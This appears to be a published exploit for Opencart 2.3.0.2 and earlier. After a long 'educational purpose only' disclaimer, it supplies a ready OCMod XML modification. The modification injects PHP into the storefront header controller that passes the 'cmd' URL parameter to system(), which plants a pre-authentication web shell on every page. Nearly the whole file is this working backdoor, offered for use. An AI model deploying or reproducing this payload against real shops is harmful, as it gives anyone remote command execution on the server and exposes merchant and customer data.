Share
<?xml version="1.0" encoding="utf-8"?>  
  
<!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE -->  
  
<!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> -->  
  
<!-- Disclaimer: -->  
  
<!-- This or previous programs is for Educational -->  
<!-- purpose ONLY. Do not use it without permission. -->  
<!-- The usual disclaimer applies, especially the -->  
<!-- fact that Todor Donev is not liable for any -->  
<!-- damages caused by direct or indirect use of the -->  
<!-- information or functionality provided by these -->  
<!-- programs. The author or any Internet provider -->  
<!-- bears NO responsibility for content or misuse -->  
<!-- of these programs or any derivatives thereof. -->  
<!-- By using these programs you accept the fact -->  
<!-- that any damage (dataloss, system crash, -->  
<!-- system compromise, etc.) caused by the use -->  
<!-- of these programs is not Todor Donev's -->  
<!-- responsibility. -->  
  
<!-- Use them at your own risk! -->  
  
<!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml -->  
  
<modification>  
<name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name>  
<code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code>  
<version>1.0</version>  
<author>Todor Donev</author>  
<link>mailto:todor.donev@gmail.com</link>  
  
<file path="catalog/controller/common/header.php">  
<operation>  
<search><![CDATA[// For page specific css]]></search>  
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){  
echo "<pre>";  
$cmd = ($this->request->get['cmd']);  
system($cmd);  
echo "</pre>";  
}]]></add>  
</operation>  
</file>  
</modification>